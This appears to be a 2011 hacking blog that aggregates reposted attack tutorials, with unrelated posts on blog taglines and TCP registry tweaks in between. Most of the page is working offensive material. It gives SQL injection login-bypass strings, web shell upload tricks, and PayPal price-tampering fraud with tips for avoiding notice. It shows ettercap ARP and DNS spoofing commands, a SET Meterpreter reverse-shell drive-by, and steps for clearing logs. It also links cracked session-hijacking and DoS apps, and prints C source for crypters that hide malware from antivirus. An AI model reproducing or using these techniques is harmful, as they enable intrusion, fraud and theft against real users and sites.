Wednesday, 21 December 2011

[TUT] Hacking PHP 4.4 sites with in 4 seconds[TUT]

This post is not written by me just wanted to share this interesting article which i found while i was surfing .. so read on

Hacking PHP 4.4 sites with in 4 seconds

[b]Step 1 [/b]Search for vulnerable sites

Make a Google dork to find sites running Apache and PHP 4.4 . Its quite easy.

Step 2 Scan them

Start by scanning them using Nmap,Do and intense scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login.
Now just login using port 2000

ie -

and you will be comfortably login into admin page like this -

[Image: asd%5B12%5D.jpg?imgmax=800]

Step 3 – Hack them

Now in the fields,you have to type -
username – admin
password – a’ or 1=1 or ‘b
domain - a’ or 1=1 or ‘b

[Image: asdf%5B12%5D.jpg?imgmax=800]

and press go,you will login into admin

[Image: dfr%5B9%5D.jpg?imgmax=800][/code] have hacked into admin. Actually sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.It will literally take 20 seconds.
I hope that was informative :P go learn something.
Read More
Hi everyone! This is a guide for some Awesome Android Hacking Tools! A lot of people may not be aware but there are some great tools for network hacking on your mobile device. Here is my list of favorite apps and how best to use them.


First off I am going to cover the basics on covering your tracks and network discovery.

Mac Address Spoofing:

MacAddress - This app lets you change your wifi Mac Address. It is no longer availabe ANYWHERE! I uploaded the APP here for HF - Download here

Network Mapping:

Network Mapper - This tool lets you scan a network for live hosts and check for open ports.

Packet Sniffing (Non-Intrusive) :

Shark for Root & Shark Reader - Shark is a popular port (or simular) to WireShark (Based of TCPDUMP). It lets you log network traffic and analyze it on your device!

This is the logger:

This is to read the logs:

Now time for the GOOD STUFF!!!

Below are some of the best hacking apps for android. Real hacking apps! In my opinion these are a lot more effective than most Linux apps!

Session Hijackers:

Faceniff - Pwning Facebook was never so easy! This is by far one of my favorite apps! Faceniff is a Session Hijacker like Firesheep or hamster/ferret but BETTER. No more need to use cain and able and firesheep to hijack. Also who would suspect a cell phone as a hacking tool?  Faceniff will sniff the network and display active sessions and Hijack them! It can hijack the following -

It is a paid app but here is a cracked versions. just install and enter any activation code and bam! Download

My other favorite Hijacking app is:

Droid Sheep - Droid sheep does the same as above and the author is working on SSL Stripping as well! I personally prefer this over Faceniff! Get it here: Download here

Finally the ULTIMATE android hacking tool and a special treat for you guys as it is still in beta I am going to leak my APK here!

ANTI - AKA: Android Network Tool Kit. Anti can do a LOT! Here is the description from the website:

[+] Scan - This will scan the selected target for open ports and vulnerabilities, also allowing the user to select a specific scanning script for a more advanced/targeted scan.

[+] Spy - This will 'sniff' images transferred to/from the selected device and display them on your phone in a nice gallery layout. If you choose a network subnet/range as target, then all images transferred on that network - for all connected devices - will be shown. Another feature of the Spy plugin is to sniff URLs (web sites) and non-secured (ie, not HTTPS) username/passwords logins, shown on the bottom drawer.

[+] D.O.S - This will cause a Denial Of Service (D.O.S) for the selected target, ie. it will deny them any further access to the internet until you exit the attack.

[+] Replace images - This will replace all images transferred to/from the target with an Anti logo, thus preventing from attacked used seeing any images on their browsers while the browse the internet, except for a nice looking Anti logo...

[+] M.I.T.M - The Man In The Middle attack (M.I.T.M) is an advanced attack used mainly in combination with other attack. It allows invoking specific filters to manipulate the network data. Users can also add their own mitm filters to create more mitm attacks.

[+] Attack - This will initiate a vulnerability attack using our Cloud service against a specific target. Once executed successfully, it will allow the attack to control the device remotely from your phone.

[+] Report - This will generate a vulnerability report with findings, recommendations and tips on how to fix found vulnerabilities or bad practices used.

Anti supports & uses the followings OSS tools :
We will be releasing patch sets for OSS shortly. This should assist developers to compile binaries used by Anti!


Anti Can Steal SSL Encrypted logins (GMAIL ETC), Anti uses driftnet to spy on images a slave computer is viewing, Anti Can Brute Force passwords and even remote exploit a computer using metasploit! Anti also uses nmap to map targets and uses OS Detection! Not to mention anti has the ability to DOS a network. The only downside is that if you want to use a Metasploit hackable computer you need to buy credits however everything else works! I hosted so it stays live.

Here is the leak of my beta apk  Download here

Finally I have one more cool apk!

WifiKill: This is a simple Denial Of Service App. It will let you either completely freeze a users Internet access or DOS the whole network! Here is the app (Also Unreleased Beta)  : Download here
Read More

Sunday, 18 December 2011

45 Creative, Clever And Effective Blog Taglines

Taglines are perhaps the most underrated and underused elements of personal and business blogs, yet they serve a huge function.
The social web has conditioned us to move through content-based sites quickly, and if we reach a site with an unclear thesis we’re likely to click to the next thing.  You also can’t count on visitors to read your “about” page.  In a world that increasingly moves at 140 characters or less, having a hook such as a clever tagline can make all the difference.
Taglines are your brand’s elevator pitch and help people get a quick snapshot of who you are. It’s your opportunity to be descriptive, catchy, memorable and create a unique brand for your blog.  They also present a great opportunity for keyword inclusion, but not at the sacrifice of stickiness.  Ideally you can combine something catchy and SEO friendly.
To help inspire you the next time you launch a blog – or any type of web publication – I pulled together what I think are some of the more creative, clever and effective taglines from around the blogosphere:
1.  How To Change The World: A practical blog for impractical people
2.  Successful Blog: You’re only a stranger once
3.  Conversation Agent: Connecting ideas and people – how talk can change our lives
4.  Sugarrae: Never mess with a woman who can pull rank
5.  Boing Boing: A directory of wonderful things
6.  PR Squared: It may be the future but you still gotta eat
7.  The Consumerist: Shoppers bite back
8.  Zen Habits: Simple Productivity
9.  Yoast: Tweaking Websites
10.  PR 2.0: The future of communication starts here
11.  CopyBlogger: Copywriting tips for online marketing success
12.  /Film: Blogging the reel world
13.  Broadcasting Brain: Harvesting cognitive surplus for uncanny content
14.  Psyblog: Understand your mind
15.  Lifehacker: Tips and downloads for getting things done
16.  Think Simple Now: Creativity, Clarity, Happiness
17.  Violent Acres: Like you, but with poor impulse control
18.  Bacon Today: Daily updates on the world of sweet, sweet bacon
19.  Shoemoney: Skills to pay the bills
20.  Techno Theory: Technical…Practical…Theoretically Interesting
21.  Publishing 2.0: The (r)Evolution of media
22.  Geek Sugar: Geek is chic.
23.  Smashing Magazine: We smash you with the information that will make your life easier. Really.
24.  A VC: Musings of a VC in NYC
25.  Steve Pavlina: Personal development for smart people
26.  Simply Fired: If you don’t laugh, you’ll cry.
27.  So Good: An absurd look at the world of food
28.  Get Rich Slowly: Personal finance that makes cents
29.  Personal Branding Blog: Navigating YOU to future success
30.  SEO Book: Learn. Rank. Dominate.
31.  The Impulsive Buy: Putting the “ew” in product reviews
32.  PluginID: Plugin to your identity
33.  Kottke: Home of fine hypertext products
34.  Freakonomics: The hidden side of everything (also a book, but a great tagline none-the-less)
35.  Web Worker Daily: Rebooting the workforce
36.  Online Marketer Blog: If Copyblogger and JaffeJuice had a bad-ass baby
37.  Auto Blog: We obsessively cover the auto industry
38.  Advergirl: …yeah, I have an opinion about that
39.  TwiTip: Twitter tips in 140 characters or more
40.  Duct Tape Marketing:  Simple, effective and affordable small business marketing
41.  Apartment Therapy: Saving the world, one room at a time
42.  TechCult: Technology, Twisted
43.  Illuminated Mind: The less boring side of personal development
44.  Don’t Drink The Kool-aid: Join the conversations. Just don’t drink the Kool-aid.
45.  Slashdot: News for nerds, stuff that matters
A few quick observations noted while compiling this:
  • It was easy to get quite a few of these as the catchier taglines are sticky enough to recall without even visiting the site
  • Only a few of these taglines are conscious of SEO, but it is an opportunity
  • Many taglines were part of the image instead of as HTML text on the page, so if you’re going to include keywords be sure that they are text-based or at a minimum, include them as alt text to the image
  • Many blogs have no tagline at all, relying purely on their name to tell the story
  • Strong taglines make a great first impression
  • Descriptive taglines work just fine too if they match the content
  • Taglines can work in conjunction with the name of the blog itself – the two support each other
  • Simply reading the taglines of sites you already know can provide a mental image of the site
  • For blogs with non-descriptive names, taglines become even more important
This is of course an incomplete list, so we’ll turn it over you.  Share your favorite blog taglines in the comments that you think are creative, clever or effective.
Read More

Friday, 16 December 2011


Today I will show you how you can upload a webshell to a website after you have successfully found your way into the admin panel. IN this example I will use a site I hosed the other day through use of double query SQL injection. I will start with the end of my SQLi session and dive into working to upload a shell through the admin panel. Please hold your questions till the end ;)

Ok so you found a vulnerable site and or somehow have managed to come across the admin credentials.
[Image: 46497385.png]

Uh oh, it is encrypted MD5! It's OK, we do quick check with the big online databases to save time and if we don’t find it there then we follow my other tutorial on how to use Hashcat tools to crack it ourselves (My Cracking TuT1, TuT2, TuT3, TuT4, & TuT5). Lucky for us our Admin choose poor strength password which was easily found online with a quick check:
[Image: 82602502.png]

OK, so now we have admin credentials. We use our favorite admin finder if we have not already, cross our fingers, and hope we find one that will work with the credentials we found.

You can use online admin finder here:
(I also suggest you try out user Join7's release as it is also very good)
[Image: 53629829.png]

Once you make your way into the actual admin panel it is wise to take a look around to see what all you have access to. If you just want to leave your mark you may be able to quickly edit HTML on pages or inject a hidden iframe or an effective stored XSS of some kind (pop-up or redirect), but for this tutorial we will be focusing on how we can get a web-shell on the site, something like c99, GNY, etc. We will have much more flexibility with a full featured web-shell. OK, so you will want to look around and see what you can do as admin, maybe quickly add a new user with some rights in case the real admin changes their password. Then start looking for ways to upload things, doesn't really matter what it is for now - typically you can find areas to add news, products, images, movies, etc. We will leverage one of these upload fields to inject our shell instead and gain better access to our target site. In some cases you will find you can simply upload your shell with no problems, so always check if it will take “shell.php” first. In most cases it won't, if it does then there is no reason to continue reading as you’re in . If it doesn't then things get interesting as we need to now find a way to manipulate our upload so it bypasses any file restrictions. How can we do this you say? By controlling our request we send in more detail. We will use Live HTTP Headers add-on for Firefox in this example, you could also use Burp Suite, or Tamper Data add-on (others exist too but these are main options I know). We will use these tools which allow us to manipulate more aspects of the actual HTTP request we send when we hit the actual upload button. We first will upload our file as “shell.php”.
[Image: 19323043.png]

We typically will get an error indicating we can’t upload PHP files, and if we are lucky it will tell us what kind of files are acceptable. OK, let us try to fool it into thinking it is something else that is on the acceptable list. We can play wile file naming conventions or through the addition of NULL bytes (). They both are effective and you really have to play with both options until you find something which works, here are a few common methods I use which you can easily expand upon:

[Image: 55433318.png]

You get the idea. The point is that the “.xxx” file ending is what gets read during check and when server scans hopefully the null byte () causes it to stop reading the rest making it stop at “.php”. If this doesn't work or you shell is getting messed up when it is uploaded then we will use Live HTTP Headers to modify the request on the fly and in addition to faking out the file type we will straight change the file type in the request we send. Start Live HTTP Headers and make sure it is setup to capture requests (small check box at bottom):
[Image: 19812697.png]

Then you first submit the one that works to simply work and get the request formatting saved. Then replay the request so that a new window pops up and then modify the text in the request to remove the fake.fake-file-ending part so all that is left is “shell.php”.
[Image: 89812894.png]
NOTE: you probably need to scroll to the top and choose the first one since we started it only to capture the submission this should be the first request

When you hit replay it pulls up the original request to modify before sending. Find the part for the filename (use FIND to make it quick). Change the file name so all that is left is “shell.php” and then hit replay again. It will submit through browser and you should now be done.
[Image: 85813335.png]

[Image: 72138792.png]

Now find the file by right clicking or whatever means necessary and open in new browser tab.
[Image: 47324061.png]

Voila shell properly uploaded and working – Game Over, you win!
[Image: 69334989.png]

If you have problems finding your shell, here are a few helpful hints to finding it:
1 – Right click uploaded image on site and check its location. See if directory indexing is turned off, if it is not then you can easily see what all is in the folder until you find your shell. You might have to try a few images or locations on the site, just try to use other items from the same category your uploading to and think logically about it.
2 – If you can’t find it then I suggest scanning the site with a web-scanner like Accunetix, W3af, or something else you like better to see if it can find it (infrastructure scanning, or if you require password for shell check for auth files, or backdoors, etc)
3 – If you absolutely still can’t find it, you can try Google search to help find your shell. Use dorks and text from your shell or file name to try and find it on site.

Remember you won’t always get admin access and you can’t shell every site, but here is one more trick to add to your bag to increase your chances. If you’re a coder, then this is one more reason to check your uploads as you won’t always get what you expect coming through, don’t expect every user to be nice and use the system as intended as this method can be used against any upload form, not just admin panels. I hope you have enjoyed this brief tutorial. If any questions, comments, or suggestions please post here or let me know.
Read More

Monday, 12 December 2011

These settings allow you to boost the speed of your broadband Internet connection when using a Cable Modem or DSL Router with Windows 2000 and Windows XP.

Open your registry and find the key below.

Create the following DWORD values, as most of these values will not already exist you will need to create them by clicking on 'Edit -> New -> DWORD Value' and then set the value as shown below.

DefaultTTL = "80" hex (or 128 decimal)
Specifies the default time to live (TTL) for TCP/IP packets. The default is 32.

EnablePMTUBHDetect = "0"
Specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. The default is 0.

EnablePMTUDiscovery = "1"
Specifies whether the TCP/IP stack will attempt to perform path MTU discovery as specified in RFC 1191. The default is 1.

GlobalMaxTcpWindowSize = "7FFF" hex (or 32767 decimal)
Specifies the system maximum receive window size advertised by the TCP/IP stack.

TcpMaxDupAcks = "2"
Determines the number of duplicate ACKs that must be received for the same sequence number of sent data before "fast retransmit" is triggered.

SackOpts = "1"
Enables support for selective acknowledgements as documented by Request for Comment (RFC) 2018. Default is 0.

Tcp1323Opts = "1"
Controls RFC 1323 time stamps and window scaling options. Possible values are: "0" = disable RFC 1323 options, "1" = window scale enabled only, "2" = time stamps enabled only and "3" = both options enabled.

TcpWindowSize = "7FFF" hex (or 32767 decimal)
Specifies the receive window size advertised by the TCP/IP stack. If you have a latent network you can try increasing the value to 93440, 186880, or 372300.

Exit your registry and restart Windows for the changes to take effect.

If you don’t want to edit the registry, here's a little TCP utility that is ideal...
Read More
To do this hack, you need a FireFox add-on called “Tamper Data”. Get it here:

1. Download and install Tamper Data.

2. Use Google to find sites that take Paypal as payment.

3. Find something that you are interested in. (Paying for scripts seems safest)

4. Click add to cart

5. Continue to checkout

6. Right before you click the button to be forwarded to Paypal for payment, turn on Tamper Data in the Tools section of FireFox.

7. Every time the site tries to store something, Tamper Data pops up and asks what you want to do. Being very careful, glance down and look for the price of the item, if it’s not there, then click ok; If it is then select the price and change it to what you want to pay. Then click ok.

8. Once Paypal has loaded, turn Tamper Data off by clicking stop tamper.

9. Notice Paypal now charges you whatever price you entered earlier.

Additional Notes:

- Instead of setting the price to $0.01, set it to 1% of the actual price. This way if the shopkeeper does a quick glance at his Paypal account, he will see $1.50 and may (provided it’s a quick glance) think it’s the correct amount- $150. It’s human nature to speed things up and if the owner sees the order has been paid for in PayPal, most will automatically assume it’s correct.

- In the chance that you do get caught this tactic of moving the decimal place also can help the store owner believe the messed up payment is due to a computer problem rather than hacking.
Read More

Monday, 5 December 2011

this is useful for infecting people on your own network, or wifi like McDonalds or free wifi spots, you could attach a driveby or anything :D

first bootup backtrack (gnome)
you can get a live cd from here:

login: root
pass: toor


click applications.
click internet
click wicd network manager

[Image: 1.png]

connect to network.

click applicatinos
click accsesorys
click termanal

sudo bash
[Image: 2.png]
apt-get install ettercap
(press y then enter)
[Image: 3.png]
apt-get install ettercap-gtk
(press y then enter)
[Image: 4.png]

click places.
click home folder
click file system
click var
click www

[Image: 8.png]

copy and paste your html files into here, make sure you name the index, index.html


click applications
click backtrack
click services
click httpd
click apache start

wait for apache window to close

click places.
click home folder
click file system
click usr
click share
click ettercap

[Image: 9.png]

open etter.dns

[Image: 10.png]

you should format it like this:

Code: A

* A

the being the site you want, the star being any subdomain of the website to spoof and the being your local ip adress, wich you can find by going to termanal and typing
and looking for wlan0 under inet e.g: addr:

[Image: 11.png]

configure this file as you pleese and save it when finished.

go back to your termanal session and type:
ettercap --g

a gui should pop up
click sniff
click unified sniffing
choose wlan0 or your network interface
click hosts
click scan for hosts
this scans the network for computers:
click hosts, host list
click the network modem, or router, the gateway
in my case is and add it as target 2
add the people you want to spoof as target 1

[Image: 12.png]

click start
click start sniffing
click mitm
click arp poisoning
click ok
click plugins
click manage plugins
double click on dns_spoof

congradulations, you did it :D
Read More

Friday, 2 December 2011

[TUT]\ Become able to hack any computer

In this tutorial I will talk a little about.
# Making it all ready for an attack
# Port forwarding
# Being anonymous
# Fingerprinting the attack host
# Attacking it
# Clearing logs/tracks

Okey let`s get started

# First of all when you want to hack another computer (ex. from another country), you have to have everything set up and ready.

I you wan`t to exploit the slave, you find exploit libraries on the web, if you want to make a payload attack, you set up your server and create the handler, or if you are going to make a DoS/DDoS attack you make webhost`s and configure the connections, the same with like SQL injections or RAT`s/trojans.
Next thing you have to do, is to have some program where you store DATA, strings and info.
When you have this set up and ready you move to the next step.

# To make any attack working, there are some things that have to be in order. First off you find out what ports the exploits, payloads, RAT`s, trojans, Sql injection or any other infection software uses, you write them down. Secondly you go into your router`s configuration (ex., and set up port forwarding for the desired ports (this makes is possible to hack/crack/infect through your network and into another).

# When you know what attack you want to try, you take it from there. The most important thing is that you don`t get caught doing this, and because of that here are some ways to slow the WHH "IF" they get a track of you.
# Use proxy
# MAC spoofing
# SSH tunneling (Secure shell tunneling)
# Make a botnet on a random network and use them as cover up`s

# When you have this set up you can slowly begin to scan the slave computer (if you have their static IP or know their network/what ISP they use)
I recommend using nmap (remember to use -sS "stealth mode") to not make a traffic overflow on the slave`s network (if it has good firewalls it will log, and block your IP if you use it without -sS).
Then check the host either with a full scan, or a desired scan (like port:21 "ftp", to check if it`s open or not).
When you are finished with the scan you write the info down (which ports are open and which are not).
After that you should use nmap zenmap GUI to fingerprint the victims OS and what SP its using (and write that down).

# Now you know which ports are open and what OS is installed, what firewall is in use and if there`s any Anti Virus, and ofc you have -ping`ed the host to see if its alive. Now you can filter the attacks you planned, and use one that matches (if port 443 id open you can use a payload attack etc.).
Then when you have everything ready you make the attack (remember to always use stealth mode when hacking (not just trying to smash your way through).

# When you have successfully attacked the slave (planted the RAT, reverse_tcp meterpreter, Reverse Shell, infected it or made an overload) it is very important that you know what you did and that you are capable to clear off your logs. Ex. clear the logs in the firewall (foreign connection logs), windows command logs (DOS prompt) etc.

When you have cleared all logs you have successfully hacked a computer..Yeye

Okey, remember this was not a walk by tutorial, but it show you what you have to remember when you are in cyber warfare. Hope you liked it
Read More

Thursday, 1 December 2011

How to get into local machines using SET + ETTERCAP

My old Tutorial (ettercap + set phishing) got deleted because of its phishing contents. But because I think that it describes a really great method how to use SET+ettercap together, I decided to write this Tutorial in a slightly different way again.

I will use ARP-Poisoning in this Tutorial, which is pretty well explained here. This Tutorial was made using Backtrack 5, which you need too or at least another Linux distro with installed SET, Metasploit and ettercap.

Step 1: Setting up the Fake-Page

a. Start SET, it will look like this

[Image: ymn6i.png]

b. Choose Website Attack Attack Vectors by typing 1

[Image: PUuvD.png]

c. Choose Java Applet Attack

[Image: mvO69.png]

d. Here choose Custom Import, so you can use this script to clone the site in which you want to inject the DriveBy,
so that you can edit the content of the cloned page before SET makes evil stuff with it :P. I cloned for example, and after cloning I edited the index.html with changing the JAVA + YOU, DOWNLOAD TODAY part to sth like IMPORTANT JAVA UPDATE. You dont have to use this option, you can simply use the Site-Cloner from SET, too.

e. After choosing your site, you have to choose the Payload (Program, that lets you do things with the slave that was on your site and accepted the Java-thing, pretty much like a RAT. Here a Tutorial about how to use Meterpreter). I recommend choice 2 (Windows Reverse_TCP Meterpreter) in here, or if you know that your target has a 64 bit operating system, choose 5 (Windows Reverse_TCP Meterpreter x64), because the x64 one is completely FUD.

f. Now you have to choose the encryption of the Payload , so that it wont get detected by the victims AV. Just choose 16 (Backdoored Executable), which is currently the best.

g. Yet SET is setting up a Metasploit-Listener, which will show you if someone clicked on your Java DriveBy. You MUST keep this window open.

[Image: xwOiE.png]

Step 2: Use ettercap to redirect slave/s to your fake-site

a. The first thing you have to do, is opening the etter.dns file, which is located in /usr/share/ettercap. Just delete everything in it, and if you want to redirect every site your slave visits, write the following into it:

* A yourip

If you only want to redirect one page, write this:

thesiteyouwanttoredirect A yourip

So at my specific case, the etter.dns file looks like this (Everything gets redirected to my fake page):

* A

b. Running ettercap

After configuring everything, you can now run the following command:

ettercap -T -q -P dns_spoof -M ARP // //

This poisons the whole local network, what means, that every PC in your local machine gets redirected to your fake-page.
If you want to redirect only one single PC, you have to run this command:

ettercap -T -q -P dns_spoof -M ARP /ipofyourvictim/ //

And here is what the parameters actually mean:
-T means Text Interface, so you got no annoying GUI
-q means silent mode, ettercap doesnt display everything it does (which were really annoying)
-P means ettercap hast to use the dns_spoof plugin, which is responsible for the redirecting
-M ARP means Man In The Middle Attack, the whole traffic into your network goes first through your PC
Read More


1: encrypts “.text” section
2: you must have enough free space at the end of the section for the stub
3: there may not be transparency in the RVA (like – raw size = 1000, virutal size = 2000) for that section, or it may malfunction
4: *edited* how did i miss that, there must be no relocations for “.text” section
He have also mentioned that “at first i was going for a more complex one, but seeing that there were some problems which easily took me a whole day to solve (damn RVA’s!) and as the source size became larger, i decided to go with this. After all, this is just an example. It is heavily commented, though unnecessary at most.
Im not doing a tutorial (and im not fond of them), because it is indeed easy, and if you dont understand this code, im sorry, but then you need to learn about PE and/or go back and continue with C/C++…”
If you do not know much about executable file format, you might want to take a look at Peering Inside the PE: A Tour of the Win32 Portable Executable File Format by Matt Pietrek.  Another good source that mindlessdeath has updated me with was The PE File Format.

Source Code

Before you look at the source code below and try to execute them, you might want to read what the comments are about. You might also want to read on updates from the author himself in the thread that he has originally posted here.
001<pre>#pragma comment(linker, "/OPT:NOREF") // this tells the linker to keep the machine code of unreferenced source code
002#pragma optimize("", off) // disable all optimizations in order for our stub to run smootly, though im not sure if it really helps, i just saw some guy doing it this way lolz :)
004#include <windows.h> // familiar?
005#include <stdio.h> // i wonder what this might be, hmm...
007// gets the first sections header offset
008#define SECHDROFFSET(a) ((LPVOID) ( (LPBYTE) a           + \
009                        ((PIMAGE_DOS_HEADER)a)->e_lfanew + \
010                        sizeof(IMAGE_NT_HEADERS)))
012// those are the offsets to the
013#define OEP_o 21 // original entry point
014#define SEG_o 11 // virtual address of section
015#define BSZ_o 1  // block size, must be a multiple of 8
016#define  SZ_o 6  // section size, must be a multiple of the chosen block size
017                 // values in the stub
019// a simple block xor
020// every byte in the given block is XOR'ed with its index
021void _xor_block(unsigned char *pblock, unsigned int blocksize)
023    unsigned int i;
025    for(i = 0; i < blocksize; i++)
026        pblock[i] ^= i;
028    return;
031// just a wrapper around the above function
032int _xor_chunk(unsigned char* pchunk, unsigned long chunksize, unsigned int blocksize)
034    if(chunksize % blocksize || blocksize % 8)
035        return -1;
037    unsigned long index = 0;
039    while(index < chunksize)
040    {
041        _xor_block(pchunk + index, blocksize);
042        index += blocksize;
043    }
045    return 0;
048// this is our stub and the new entry point for the encrypted PE
049__declspec(naked) void __stdcall _stub(void)
051    __asm
052    {
053        push 0xFEFEFEFE //blocksize
054        push 0xFDFDFDFD //chunksize
055        push 0xFCFCFCFC //pchunk
057        call _xor_chunk //decrypt
059        mov eax, 0x7FFFFFFF //oep
060        jmp eax //go go
061    }
064// a placeholder, used for stub size calculation
065__declspec(naked) int _end(void)
067    __asm ret 8
070// so basicly the ASM code of the above 3 (w/o _end) functions will be added to the end of the ".text" section
071// after updating the proper values in the stub, ofc
072// then the PE header is updated along with the section header
073// and with the entry point at _stub's code its all done! wow that was easy oO
076int main(void)
078    // im not going to lecture you about those, if you are not familiar with these structures, you should go read about PE format...
079    PIMAGE_DOS_HEADER     pDosH;
080    PIMAGE_NT_HEADERS     pNtH;
083    // variables
084    HANDLE hFile;
086    DWORD  dwFileSize, dwSectionSize, dwStubSize,
087           dwVSize, dwOldProt, dwSpot, dwGap, bytes;
089    LPBYTE FileBuffer, SectionBuffer;
090    CHAR FileName[MAX_PATH];
092    // get the filename to encrypt
093    printf("File to encrypt: ");
094    scanf("%s", &FileName);
096    // open it and get the size
098    dwFileSize = GetFileSize(hFile, 0);
100    // load in memory
101    FileBuffer = (LPBYTE) malloc(dwFileSize);
102    ReadFile(hFile, FileBuffer, dwFileSize, &bytes, 0);
104    pDosH = (PIMAGE_DOS_HEADER) FileBuffer;
106    // check if it is valid PE, i would say that this is merely a proper check, for a proper one you would need to calculate all the RVA's and see if they are valid
107    if(pDosH->e_magic != IMAGE_DOS_SIGNATURE)
108        return -1;
110    pNtH = (PIMAGE_NT_HEADERS) (FileBuffer + pDosH->e_lfanew);
112    if(pNtH->Signature != IMAGE_NT_SIGNATURE)
113        return -2;
117    while(memcmp(pSecH->Name, ".text", 5)) // get the ".text" section header
118        pSecH++;
120    dwVSize          = pSecH->Misc.VirtualSize; // the virtual size of the section, later this will be used as chunksize in our stub, after proper alignment
121    dwSectionSize    = pSecH->SizeOfRawData; // speaks for itself
122    dwStubSize       = (DWORD) _end - (DWORD) _xor_block; // the stubsize, in bytes
124    SectionBuffer = (LPBYTE) malloc(dwSectionSize); // allocate memory enough to hold our raw section data
125    memcpy(SectionBuffer, FileBuffer + pSecH->PointerToRawData, dwSectionSize); // ... copy the data
127    _xor_chunk(SectionBuffer, dwSectionSize, 256); // aaand encrypt it! you can use different block sizes here - 8, 16, 32, 64, 128, 256, 512...
128    memset(SectionBuffer + pSecH->Misc.VirtualSize, 0, (dwSectionSize - pSecH->Misc.VirtualSize)); // fill with zeros after the end of actual data
130    dwSpot = pSecH->Misc.VirtualSize; // this will be the offset (relative to the beginning of the section) where we will place our stub
132    while(dwSpot % 16) // align it to 16 byte boundary
133        dwSpot++;
135    dwSpot += 256; // this is in order to prevent the stub from corruption by overwriting its own code, since we will place it after the end of the section data
136    dwGap   = dwSpot - pSecH->Misc.VirtualSize; // the gap between our stub and the end of the data
138    DWORD oep = pNtH->OptionalHeader.AddressOfEntryPoint + pNtH->OptionalHeader.ImageBase; // the original entry point, this is a linear address
139    DWORD seg = pSecH->VirtualAddress + pNtH->OptionalHeader.ImageBase; // the section address, you guessed right, this too is a linear one
140    DWORD bsz = 256; // you know what this is
142    while(dwVSize % bsz) // we need to align it to block size
143        dwVSize++;
145    VirtualProtect(_xor_block, dwStubSize, PAGE_EXECUTE_READWRITE, &dwOldProt); // to be able to update the stub...
147    // and update it, blah, blah, blah...
148    memcpy((void *)((unsigned long) _stub + OEP_o), &oep, 4);
149    memcpy((void *)((unsigned long) _stub + SEG_o), &seg, 4);
150    memcpy((void *)((unsigned long) _stub + BSZ_o), &bsz, 4);
151    memcpy((void *)((unsigned long) _stub +  SZ_o), &dwVSize, 4);
153    memcpy(SectionBuffer + dwSpot, _xor_block, dwStubSize); // place the damn thing already!
155    pSecH->Characteristics                        = 0xE0000060; // R/W/E, executable code, initialized data. although my experience shows that you are just fine with R/W...
156    pSecH->Misc.VirtualSize                      += dwStubSize + dwGap; // update the virtual size of the section
157    pNtH->OptionalHeader.AddressOfEntryPoint  = pSecH->VirtualAddress + dwSpot + ( (DWORD)_stub - (DWORD)_xor_block ) ;
159    // and finally update the file
160    SetFilePointer(hFile, pSecH->PointerToRawData, 0, FILE_BEGIN);               //new section data
161    WriteFile(hFile, SectionBuffer, dwSectionSize, &bytes, 0);
163    SetFilePointer(hFile, pDosH->e_lfanew, 0, FILE_BEGIN);                       //new PE header
164    WriteFile(hFile, pNtH, sizeof(IMAGE_NT_HEADERS), &bytes, 0);
166    SetFilePointer(hFile, ((DWORD) pSecH - (DWORD) FileBuffer), 0, FILE_BEGIN); //new section header
167    WriteFile(hFile, pSecH, sizeof(IMAGE_SECTION_HEADER), &bytes, 0);
169    // some good habits :)
170    CloseHandle(hFile);
172    free(FileBuffer);
173    free(SectionBuffer);
175    return 0;
178// bye, bye, EOF
Read More

How to make your own crypter in C

I have seen lots of people asking for a c/c++ runtime crypter, most answers point to general guidance or worse, nothing of importance. So I’ve decided to show step by step a solution to creating your own crypters.

What to expect
[*]Builder/Stub relationships
[*] Understanding a RunPE function (The magic!)
[*] Simple API obfuscation
[*]A finished Open-Sourced Public Version of my cypter
What NOT to expect
[*] A fully featured FUD crytper
There are several features to a crypter that I have intentionally left out, and will highlight during this write-up. They are meant as additional learning opportunities for you to research on your own.
*Please be advised this crypter is not FUD, as often to do so obfuscates the code and makes it difficult for a tutorial on this subject. It is my hope that the steps I show here will give you the conceptual understanding so that you are able to rewrite one that will be completely undetectable.
** All work was compiled using Code::Blocks and the mingw compiler
-Begin by starting a new c console app (Not C++)
Part I: Allocating the file to encrypt
All the data that I am going to be sending the stub is constructed in a structure
struct StubData{
unsigned char * pFileBuffer;
unsigned long FileSize;
unsigned char * pKey;
unsigned long KeySize;
The main function is primarily comprised of three function calls that illustrates the flow
LoadFile (to encrypt) into memory -> Encrypt that buffer -> Pass buffer to Stub
LoadFile Function
void LoadFile(char *File, struct StubData * sData)
unsigned long BytesRead;
printf(“[*]Loading Portable Executable\n”);
error(“Error – Cannot open file”);
}  sData->FileSize = GetFileSize(hFile, NULL);
if(sData->FileSize == INVALID_FILE_SIZE)
error(“Error – Cannot retrieve file size”);
sData->pFileBuffer = (unsigned char *)malloc(sData->FileSize);
if(sData->pFileBuffer == NULL)
error(“Error – Cannot allocate room”);
ReadFile(hFile, sData->pFileBuffer, sData->FileSize, &BytesRead, NULL);
As you can see we are passing it two pointers, one the file that we want to encrypt and two, the area where we are going to work with it. This function opens the file and allocates room on the heap and reads the file into that room and the pointer sData.pFileBuffer points to the beginning of that location.
Simple Enough
Part II: Encrypt the Buffer
Encrypt Function
void Encrypt(struct StubData * sData)
int i,j;
printf(“[*]Encoding\n”);  for(i;iFileSize;i++)
*(sData->pFileBuffer+i) ^=*(sData->pKey+j);
if (j>=sData->KeySize)j=0;
Again passing the struct pointer we manipulate the buffer using an XOR encption.  ***Research Topic 1: This function is extremely simple and also easily detectable. Research various encryptions methods (Stream/Block ciphers) to help your understanding. The RC4 and Rabbit stream ciphers are good places to start, well documents and ported to c code.
Part III: Updating Resources and Building Crypted File
I want to start this topic by talking about the Build Function but I will have to stop at some point to begin discussing the stub and finally in the end returning back here.
void Build(struct StubData * sData)
{  HRSRC hRsrc;
HANDLE hFile, hUpdate;
unsigned long rSize;
unsigned char * pBuffer;
unsigned long BytesWritten;
printf(“[*]Building Crypted.exe\n”);
hRsrc = FindResource(NULL, MAKEINTRESOURCE(1), “STUB”);
if(hRsrc == NULL)
error(“Error Could not find resource”);
rSize = SizeofResource(NULL, hRsrc);
hGlob = LoadResource(NULL, hRsrc);
if(hGlob == NULL)error(“Error – Could not load resource”);
pBuffer = (unsigned char *)LockResource(hGlob);
if(pBuffer == NULL)error(“Error – Could not lock resource”);
